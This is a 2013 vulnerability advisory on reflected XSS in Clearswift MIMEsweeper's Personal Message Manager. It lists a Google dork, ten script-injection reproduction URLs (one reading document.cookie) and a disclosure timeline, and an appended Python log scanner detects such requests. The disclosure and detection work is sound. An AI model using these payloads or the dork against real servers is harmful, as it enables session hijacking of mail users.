
MIMEsweeper For SMTP 5.5 Cross Site Scripting

18 Feb 2013 | Reported by Anastasios Monachos | Type: packetstorm | Source: packetstormsecurity.com

MIMEsweeper For SMTP 5.5 Cross Site Scripting in Clearswift Ltd application

Code
`Application: MIMEsweeper for SMTP 5.5 (5.2, 5.3, 5.4 and probably earlier versions) Personal Message Manager (PMM)  
Vendor: Clearswift Ltd  
Vendor URL: http://www.clearswift.com/  
Category: Reflective XSS  
Google dork: inurl:/MSWPMM/  
Discovered by: Anastasios Monachos (secuid0) - [anastasiosm(at)gmail(dot)com]  
  
[Vulnerability Reproduction]  
1. https://[HOST]/MSWPMM/Common/Reminder.aspx?email=test<script>alert(document.cookie)</script>  
2. http://[HOST]/MSWPMM/Common/NewAccount.aspx?email=<script>alert("xss")</script>  
3. http://[HOST]/MSWPMM/Common/NewAccount.aspx?ddlCulture=<script>alert("xss")</script>  
4. http://[HOST]/MSWPMM/Common/NewAccount.aspx?btnCreateAccount=<script>alert("xss")</script>  
5. http://[HOST]/MSWPMM/Common/NewAccount.aspx?btnCancel=<script>alert("xss")</script>  
6. http://[HOST]/MSWPMM/Common/SignIn.aspx?tbEmailAddress=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx  
7. http://[HOST]/MSWPMM/Common/SignIn.aspx?tbPassword=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx  
8. http://[HOST]/MSWPMM/Common/SignIn.aspx?cbAutoSignIn="<script>alert("xss")</script>  
9. http://[HOST]/MSWPMM/Common/SignIn.aspx?btnSignIn=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx  
10. http://[HOST]/MSWPMM/Common/SignIn.aspx?reason=<script>alert("xss")</script>  
  
[Time-line]  
17/07/2009 - Initial discovery  
13/01/2012 - Notified vendor  
13/01/2012 - Vendor responded  
16/01/2012 - Vendor requested more information  
16/01/2012 - Vendor supplied demo version of latest release (v5.5) to evaluate  
16/01/2012 - Informed vendor of evaluation progress; v5.5.0 is vulnerable too  
17/01/2012 - Telephone conversation with vendor regarding the findings  
17/01/2012 - Assigned vulnerability reference MSW-1459  
25/01/2012 - Requested status update  
25/01/2012 - Vendor replied "There is no update on MSW-1459."  
16/02/2012 - Requested status update  
26/02/2012 - Vendor replied "There is no update on MSW-1459."  
23/03/2012 - Requested status update  
23/03/2012 - Vendor replied "There is no update on MSW-1459."  
09/05/2012 - Requested status update and gave a notice for public disclosure  
11/05/2012 - Vendor replied "There is no update on MSW-1459."  
18/05/2012 - Vendor replied that the issue has been escalated to their Engineering Response Team  
07/06/2012 - Vendor informed us that the issues will be addressed in the next scheduled release  
07/06/2012 - Requested due date for next release  
12/06/2012 - Vendor informed us that the next patch release is being targeted for Q4 2012  
13/06/2012 - We suggested postponing the disclosure until after the patch is public  
06/12/2012 - Requested status update  
06/12/2012 - Vendor sent details for patch  
28/01/2013 - Patch is applicable for 5.5.1  
09/02/2012 - We requested a demo license to verify the fix  
15/02/2013 - Vendor could not produce demo license for us to verify the fix  
15/02/2013 - Vendor closes incident ticket  
18/02/2013 - Public disclosure date  
`
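
For operators of an affected PMM instance, the following added example (not part of the original advisory or the vendor's code) reviews web server logs for requests that put markup into the parameters listed in the reproduction section. It assumes IIS W3C extended logs with `cs-uri-stem`, `cs-uri-query` and `c-ip` fields; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Pages and query parameters from the advisory's reproduction list (lower-cased).
REFLECTED = {
    "/mswpmm/common/reminder.aspx": {"email"},
    "/mswpmm/common/newaccount.aspx":
        {"email", "ddlculture", "btncreateaccount", "btncancel"},
    "/mswpmm/common/signin.aspx":
        {"tbemailaddress", "tbpassword", "cbautosignin", "btnsignin", "reason"},
}
MARKUP = re.compile(r'[<>"]')  # characters that break out of HTML text or attributes

def decode(value, rounds=3):
    """Undo nested URL-encoding so %253Cscript is inspected as <script."""
    for _ in range(rounds):
        nxt = unquote_plus(value)
        if nxt == value:
            break
        value = nxt
    return value

def suspicious_params(uri_stem, uri_query):
    """Names of listed parameters whose decoded value carries markup."""
    watched = REFLECTED.get(uri_stem.lower(), set())
    return sorted({name for name, raw in parse_qsl(uri_query, keep_blank_values=True)
                   if name.lower() in watched and MARKUP.search(decode(raw))})

def scan(lines):
    """Return (client_ip, uri_stem, params) for flagged W3C extended log rows."""
    fields, findings = [], []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the rows that follow
        elif fields and line.strip() and not line.startswith("#"):
            row = dict(zip(fields, line.split()))
            hits = suspicious_params(row.get("cs-uri-stem", ""), row.get("cs-uri-query", ""))
            if hits:
                findings.append((row.get("c-ip"), row["cs-uri-stem"], hits))
    return findings

# Constructed sample log (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2013-02-18 10:00:01 GET /MSWPMM/Common/SignIn.aspx ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx 192.0.2.10 200
2013-02-18 10:00:07 GET /MSWPMM/Common/Reminder.aspx email=test%3Cscript%3Ealert(document.cookie)%3C/script%3E 198.51.100.7 200
2013-02-18 10:00:09 GET /MSWPMM/Common/SignIn.aspx reason=%253Cscript%253Ealert(1)%253C%252Fscript%253E 198.51.100.7 200
2013-02-18 10:00:12 GET /MSWPMM/Common/NewAccount.aspx email=alice%40example.com 192.0.2.11 200
""".splitlines()
```

Calling `scan(SAMPLE_LOG)` flags the second and third requests, including the double-encoded one, and leaves the ordinary sign-in redirect and the plain e-mail address alone.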
